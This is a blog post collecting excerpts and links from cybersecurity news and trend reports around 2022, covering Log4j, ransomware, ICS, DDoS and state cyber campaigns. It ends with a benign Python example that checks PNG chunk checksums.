Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat, it’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks, cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research, development and investment. Advanced 5G and wireless networks will enable higher traffic capacities, lower latency, increased reliability, and real-time processing and analytics. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated: they search for vulnerabilities and deliver malware by adapting (and automating) their tooling with machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Linux’s real trouble isn’t so much with open source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product,” points out, constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development: operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission.”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
• Critical Infrastructure (CI) and supply chains will be targeted even more in 2022 (by state-sponsored actors and cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact incident diagnosis and response capabilities. While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find the root causes of an incident by looking back at change and anomaly indicators in the network activity.
• AI will also enable better cyberthreat intelligence (CTI) reports by analysts. Next year analysts will be able to use AI tools to generate automated CTI reports. Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and to detect cyber threats more rapidly.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Mobile phone security is being overhauled
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystore technology that allows an application to generate a system-maintained key and authenticate to services (it still uses the TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension instructions added to the CPU. In this solution, TEE-type protections are provided by a secure enclave. This type of security enclave needs less code than the traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. This differs significantly from the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solutions will also come to smartphones. The Armv9-A architecture introduced last year offers a Realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an unlimited number of secured environments will in principle be available.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Cyber attacks already threaten goods deliveries too
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll warns of a “cyber pandemic”: an internet disruption could throw the world into chaos again
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are the scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in a direction where technology is evolving faster and faster, which rather increases the possibility of various disruptions and creates new types of vulnerabilities. There is no seamless security,” Limnéll says. So even with technology, the world will never be finished. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Cyber attacks are accelerating, but companies can respond to them
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those strategies are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micro report: in the future everything is at risk
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
Tomi Engdahl says:
“Hey Siri, follow that car!”
https://notmyplate.com/whitepaper/
How traffic cameras expose your location through parking apps.
Tomi Engdahl says:
Threat Trends: Vulnerabilities
https://blogs.cisco.com/security/threat-trends-vulnerabilities
It’s shaping up to be another big year for vulnerability disclosure.
Already the number of Common Vulnerabilities and Exposures (CVEs) disclosed has crossed 18,000 and it’s on track to make this another record-breaking year.
Tomi Engdahl says:
International conflicts driving increased strength of DDoS attacks: report
https://therecord.media/international-conflicts-driving-increased-strength-of-ddos-attacks-report/
Wars and regional disputes are fueling an increase in powerful distributed denial-of-service (DDoS) attacks, according to a new report from cybersecurity firm NETSCOUT. The company registered increases in the number of DDoS attacks – which flood a targeted website with junk traffic, making it unreachable – for the first half of 2022 in several countries, including Russia, Ukraine, India, Ireland, Finland and others. They tracked more than six million incidents that used 57% more bandwidth than last year. NETSCOUT calculates its figure based on its monitoring of more than 50,000 autonomous systems in 550 industries across 190 countries. also:
https://www.netscout.com/threatreport
Tomi Engdahl says:
How Underground Groups Use Stolen Identities and Deepfakes
https://www.trendmicro.com/en_us/research/22/i/how-underground-groups-use-stolen-identities-and-deepfakes.html
The growing appearance of deepfake attacks is significantly reshaping the threat landscape. These fakes bring attacks such as business email compromise (BEC) and identity verification bypassing to new levels.
Tomi Engdahl says:
Bridge firewalling “bypass” using VLAN 0
https://blog.champtar.fr/VLAN0/
L2 networks are insecure by default, vulnerable to ARP, DHCP, Router Advertisement spoofing to name a few. Over the years security mechanisms have been implemented to detect and or stop those attacks.
As usual when you try to filter anything, you MUST use an allow list approach, else you risk letting some unwanted traffic go through. I was not able to find anything about VLAN 0 attacks, so this might be a novel attack. also: https://blog.champtar.fr/VLAN0_LLC_SNAP/
Tomi Engdahl says:
https://www.securityweek.com/hacktivist-attacks-show-ease-hacking-industrial-control-systems
Tomi Engdahl says:
Researchers Crowdsourcing Effort to Identify Mysterious Metador APT
https://www.securityweek.com/researchers-crowdsourcing-effort-identify-mysterious-metador-apt
Cybersecurity sleuths at SentinelLabs are calling on the wider threat hunting community to help decipher a new mysterious malware campaign hitting telcos, ISPs and universities in the Middle East and Africa.
The never-before-seen threat actor, called Metador, uses sophisticated technical measures to deploy Windows-based malware implants and clever tricks to avoid detection, but despite months of inspecting the code, SentinelLabs researchers say there’s still no clear, reliable sense of attribution.
At the recent LABScon security conference, SentinelLabs malware hunters Juan Andres Guerrero-Saade, Amitai Ben Shushan Ehrlich, and Aleksandar Milenkoski shared technical artifacts associated with Metador and kick-started a crowdsourced effort to better understand the adversary.
“We urge defenders in targeted verticals, regardless of location, to check their telemetry for the possible presence of Metador components and to share samples and indicators with the broader research community,” the SentinelLabs team said.
Tomi Engdahl says:
https://www.securityweek.com/senators-push-reform-polices-cellphone-tracking-tools
Tomi Engdahl says:
Pass-the-Hash Attacks and How to Prevent them in Windows Domains
https://www.bleepingcomputer.com/news/security/pass-the-hash-attacks-and-how-to-prevent-them-in-windows-domains/
Tomi Engdahl says:
You probably don’t need to worry about public WiFi anymore
Here’s what a creep in a coffee shop could actually learn about you
https://www.washingtonpost.com/technology/2022/09/26/public-wifi-privacy/
From uncovered webcams to reused passwords, it’s tough to keep track of how much risk our everyday digital activities actually pose.
Take WiFi networks in airports and coffee shops. They’re part of life for anyone who travels or works remotely. They also have a reputation as cybersecurity risks. Do they still deserve it?
This means even if someone used a public network to spy on you, what they’d discover probably wouldn’t be very valuable, Wisniewski said.
Government employees, dissidents and anyone else dealing with sensitive data can use a trusted virtual private network (VPN) to cloak their activities.
Still, for the rest of us, public WiFi networks aren’t totally threat-free. Mom-and-pop shops are unlikely to keep up with necessary WiFi maintenance such as firmware updates and strong passwords, said Aaron Rinehart, co-founder and chief technology officer at cybersecurity company Verica. A truly committed criminal could impersonate a public network or website to try to steal credentials, he said.
But that’s a lot less likely than someone taking advantage of, say, your reused passwords or outdated software. Focus your energies on cybersecurity chores within your control — such as setting strong passwords, saying “yes” to software updates and learning the signs of a scam — and don’t sweat the public WiFi too hard.
“Generally, using public WiFi is safe so long as your computer is up to date and you encrypt all of your data,” said Eric Rescorla, chief technology officer at Firefox-maker Mozilla.
Tomi Engdahl says:
The Modern Data Stack Through ‘The Gervais Principle’
Data doesn’t move left-to-right in an organization, it moves through Losers, the Clueless, and Sociopaths.
https://medium.com/@laurengreerbalik/the-modern-data-stack-through-the-gervais-principle-bfd4b4e33ac7
Go and Google the term “Modern Data Stack” and search through images. What do you see? It’s one big slew of architecture diagram after architecture diagram, with data flowing throughout various systems from the left to the right in most, much sound and fury signifying nothing other than somewhere between 5 and 100 different vendor solutions to purchase to help move data around.
Fundamentally the left-to-right flow is flawed as it is a dressed up back-of-napkin representation of technology flows, not decision flows or capital allocation flows within organizations.
Ultimately the Modern Data Stack diagram is typically a vendor or VC firm or staff augmentation firm’s view of whatever is most economically beneficial for them at present.
As the firm grows over time through cycles, the Clueless layer becomes so large that it makes the firm unsustainable. Eventually, the Clueless layer takes over and collapses the company as the Sociopaths and Losers both make their exits, as they live closer to reality and can most freely move between organizations.
Tomi Engdahl says:
The gullible are easy to fool: how to recognise influence attempts
https://www.dna.fi/yrityksille/blogi/-/blogs/hyvauskoisia-on-helppo-hoynayttaa-nain-tunnistat-vaikuttamispyrkimykset?utm_source=facebook&utm_medium=linkad&utm_content=ILTE-artikkeli-hyvauskoisia-on-helppo-hoynayttaa-nain-tunnistat-vaikuttamispyrkimykset&utm_campaign=H_ILTE_MES_22-35-39_artikkelikampanja&fbclid=IwAR23fDj4BIF_Rxf3T5flF_n4YQY_TgZ2AAnwz5EuyJORsQkCR7L95DRtoxY
Hybrid influencing has preoccupied Finns in an unprecedented way during the early part of the year. Hostile influencing by a foreign actor that uses many different means can be difficult to recognise or notice. Particular attention has been paid to recognising information influencing and to countering cyber influencing.
Christina Forsgård, an expert in information influencing and founder of the communications agency Netprofile, has trained Finnish organisations, professionals and citizens to recognise influence attempts. The goal of the training is to help people recognise the tricks of hybrid influencing and protect themselves against them.
Tomi Engdahl says:
Nearly 700 ransomware incidents traced back to wholesale access markets: report
https://therecord.media/nearly-700-ransomware-incidents-traced-back-to-wholesale-access-markets-report/
Researchers have traced almost 700 ransomware incidents back to wholesale access market (WAM) platforms where people sell access to compromised endpoints, access over various remote protocols such as RDP, and more. Of the 3,612 attacks in 2021 investigated by analysts from security firm CyberSixgill, 686 involved access to a system logged in to the organization’s domain that had been offered for sale on a WAM within 180 days before the attack. Eighty-five of those cases involved access to an internal machine that had been compromised within 30 days of the attack.
Tomi Engdahl says:
Chaos Is A Go-Based Swiss Army Knife Of Malware
https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/?utm_source=rss&utm_medium=rss&utm_campaign=chaos-is-a-go-based-swiss-army-knife-of-malware
Black Lotus Labs, the threat intelligence arm of Lumen Technologies, recently uncovered a multifunctional Go-based malware that was developed for both Windows and Linux, as well as a wide array of software architectures used in devices ranging from small office/home office (SOHO) routers to enterprise servers. Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through stealing and brute forcing SSH private keys, as well as launch DDoS attacks.
Tomi Engdahl says:
Russia waging most sustained and intensive cyber campaign on record, NCSC CEO says
https://therecord.media/russia-waging-most-sustained-and-intensive-cyber-campaign-on-record-ncsc-ceo-says/
Russia’s physical invasion of Ukraine has been accompanied by “probably the most sustained and intensive cyber campaign on record”, according to one of the United Kingdom’s most senior cybersecurity officials. Despite some of the more extreme warnings from people on the fringes of the cybersecurity sector, those attacks weren’t apocalyptic nor were they intended to be. Russian attacks persistently attempted to reduce the Ukrainian government’s ability to communicate with its population, to interrupt the financial system and spread panic, and to distract Ukraine’s cybersecurity resources from their other priorities.
Tomi Engdahl says:
Securonix Threat Labs Security Advisory: Detecting STEEP#MAVERICK: New Covert Attack Campaign Targeting Military Contractors https://www.securonix.com/blog/detecting-steepmaverick-new-covert-attack-campaign-targeting-military-contractors/
Securonix Threat Research team recently discovered a new covert attack campaign targeting multiple military/weapons contractor companies, including likely a strategic supplier to the F-35 Lightning II fighter aircraft. The stager mostly employed the use of PowerShell and while stagers written in PowerShell are not unique, the procedures involved featured an array of interesting tactics, persistence methodology, counter-forensics and layers upon layers of obfuscation to hide its code. Additionally, the remote infrastructure or command and control (C2) involved with the stager was relatively sophisticated. We noticed three unique domains leveraging Cloudflare CDN which we will go over a bit more in depth later as to how each plays a role. As we’ll dive into a bit deeper in the next section, spearphishing was the primary means of initial compromise. The attack was carried out starting in late summer 2022 targeting at least two high-profile military contractor companies.
Tomi Engdahl says:
A strike here would black out Europe’s internet – Russia’s movements have already raised concern
If Russia decided to sabotage Europe, it could black out the continent.
https://www.iltalehti.fi/ulkomaat/a/45f82c32-a53d-4090-b7d0-150ba279b294
How could Russia sabotage Europe?
This question resurfaced at the start of the week, when a total of three leaks were detected in the Nord Stream gas pipelines during Monday and Tuesday.
The prime ministers of Denmark and Sweden assess that it was a deliberate act, which in their view points to probable sabotage.
According to seismological measurements, the leaks were caused by explosions, after which many have suspected Russia of carrying out some kind of hybrid operation. At this stage, however, there is no evidence of Russian involvement.
It is not only gas pipelines that run under the sea, however, but also submarine cables that are critical to telecommunications.
Jukka Savolainen, Director of the Network at the European Centre of Excellence for Countering Hybrid Threats (Hybrid CoE), considers it possible that Russia, should it so decide, could carry out some kind of strike on these data cables, which carry a large share of the data traffic between the United States and Europe.
– Yes, there is a possibility here. Russia’s reconnaissance activity in the vicinity of these Atlantic cables has already been watched with concern, he says.
The United States warned Europe six years ago that Russia had become more active near submarine cables. According to the US intelligence community, Russia’s activity, especially in the North Sea, was too close to critical cables.
– From a hybrid-warfare perspective there is clearly the possibility of a major crippling strike here, because for the time being the vast majority of traffic travels through these submarine cables, Savolainen says.
Cutting the submarine cables would be a hard blow to Europe. With slight exaggeration, one could say that the internet would go dark in Western Europe.
– If NATO and the United States respond militarily to Russia’s aggression in Ukraine, cutting the cables under the Atlantic would be the perfect counterstrike for Russia. It would be “lights out” for the European economy, a naval source interviewed by the Irish Times said early this year in connection with a Russian naval exercise.
Savolainen points out that Russia has special equipment for operations of this kind, should it want to carry out such a strike.
– With it, Russia could cut cables at a depth of several kilometres, he says.
One such asset is the Lošarik nuclear submarine, operated by Russia’s military intelligence service, the GRU, which is suspected of being part of Russia’s top-secret underwater warfare.
Experts believe that one of Lošarik’s intended uses is precisely to sabotage undersea telecommunications cables.
On 7 January, problems emerged in the telecommunications cable between mainland Norway and Svalbard. Apparently one of the cables had been cut.
– It did not plunge Svalbard into complete darkness, however; backup cables secured the telecommunications, Savolainen says.
According to the Norwegian authorities, the problems were caused by human activity, but no signs of intent were found. In any case, concern about sabotage arose in Norway.
A long list of targets
In addition to maritime targets, Russia could also strike critical infrastructure on land if it wanted to sabotage Europe and disrupt the functioning of the continent.
According to Savolainen, this is a vast field of different targets, should some state want to disrupt the lives of Europeans.
– That opens up a big package, because it concerns everything from how our goods move, payments are made and healthcare works. Of course it would also concern, for example, communications and the supply of food and energy, Savolainen lists.
– There would be a long litany of systems that could be sabotaged. And one must not forget industrial systems, such as production plants.
According to Savolainen, critical infrastructure could be struck either physically or, perhaps more likely, with a cyberattack.
– All modern systems are computer-controlled, and besides an organisation’s own technical staff, skilled hackers can also gain access to them, he points out.
Savolainen notes that the United States has also warned Europe about Russian hacker activity and that the possibility of attacks against critical infrastructure exists.
Among other things, the United States has detected the activity of Russian hackers in critical information systems.
– That could mean that readiness is being built there so that, on command, these systems go down, he says.
According to Savolainen, one can never be one hundred percent prepared for such strikes, but the European Union has nevertheless treated the matter with sufficient seriousness.
– The EU has acted in exemplary fashion, because two important directives are just about to come up for consideration, he says.
Savolainen is referring to the CER and NIS2 directives, with which the EU seeks to improve the resilience and cybersecurity of society’s critical services. NIS2, the revised cybersecurity directive, replaces the union’s earlier Network and Information Security Directive.
– In them, this whole picture has been thought through precisely, so that an EU-wide harmonisation and the organisation of cooperation are on the way, he says.
– With these directives the EU’s level is being raised considerably, so much so that one really has to offer congratulations. They have been alert there, and perhaps even early enough.
Savolainen points out, however, that a large part of these systems is the responsibility of private companies. Protection is therefore not solely a matter for the authorities.
– Security is thus created at the level of companies’ technology and IT management, he states.
Tomi Engdahl says:
https://hackaday.com/2022/09/28/the-1337-png-hashquine/
A hashquine is a fun way to show off your crypto-tricks — it’s a file that contains its own hash. In some file types it’s trivial: you just pick the hash to hit, and then put random data in a comment or other invisible field till you get a collision. A Python script that prints its own hash would be easy. But not every file type is so easy. Take PNG for instance. These files are split into chunks of data, and each chunk is both CRC-32 and adler32 checksummed. Make one change, and everything changes, in three places at once. Good luck finding that collision. So how exactly did [David Buchanan] generate that beautiful PNG, which does in fact md5sum to the value in the image? Very cleverly.
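To make the “three places at once” point concrete, here is an added example (not from the Hackaday post or David Buchanan’s work) that builds a constructed 1x1 PNG, walks its chunks, verifies each chunk’s CRC-32 and the zlib Adler-32 inside IDAT, and then shows how a single-byte change trips both checks.

```python
"""Walk a PNG's chunks and verify the integrity checks the article mentions.

Added example, not code from the Hackaday post or the hashquine itself.
The PNG is constructed in code (a 1x1 greyscale image) so it runs offline.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: big-endian length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_tiny_png(grey: int = 0x80) -> bytes:
    """Build a minimal 1x1 8-bit greyscale PNG (constructed sample input)."""
    # IHDR: width, height, bit depth, colour type (0 = grey), compression, filter, interlace
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    raw = bytes([0, grey])          # one scanline: filter byte 0 + one pixel
    idat = zlib.compress(raw)       # zlib stream; its trailer is Adler-32 of `raw`
    return (PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", idat) + make_chunk(b"IEND", b""))


def parse_chunks(png: bytes):
    """Yield (type, data, stored_crc, computed_crc) for every chunk in order."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos < len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (stored,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        yield ctype, data, stored, zlib.crc32(ctype + data) & 0xFFFFFFFF
        pos += 12 + length


def check_png(png: bytes) -> dict:
    """Report per-chunk CRC-32 results and whether the IDAT zlib Adler-32 verifies."""
    report = {"crc_ok": {}, "adler_ok": None}
    idat = b""
    for ctype, data, stored, computed in parse_chunks(png):
        report["crc_ok"][ctype.decode("ascii")] = stored == computed
        if ctype == b"IDAT":
            idat += data
    # zlib.decompress validates the Adler-32 trailer, so a tampered stream
    # fails here even if someone recomputed the chunk CRC to match.
    try:
        zlib.decompress(idat)
        report["adler_ok"] = True
    except zlib.error:
        report["adler_ok"] = False
    return report


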